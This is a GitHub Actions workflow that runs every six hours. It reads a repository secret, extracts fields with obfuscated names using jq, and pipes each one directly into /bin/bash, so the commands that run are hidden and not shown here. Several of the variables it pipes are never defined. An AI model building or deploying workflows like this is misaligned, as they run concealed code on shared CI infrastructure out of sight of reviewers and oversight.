name: sunli19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '14 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sunli19871010
        env:
          l12: ${{ secrets.l12 }}
        run: |
          echo $l12 | jq -r .jt779 | /bin/bash
          echo $iead2858 | jq -r .p7 | /bin/bash
          echo $a4 | jq -r .wdtxq56 | /bin/bash
          echo $ru6 | jq -r .i81717 | /bin/bash
          echo $tkn4892 | jq -r .ydp434 | /bin/bash

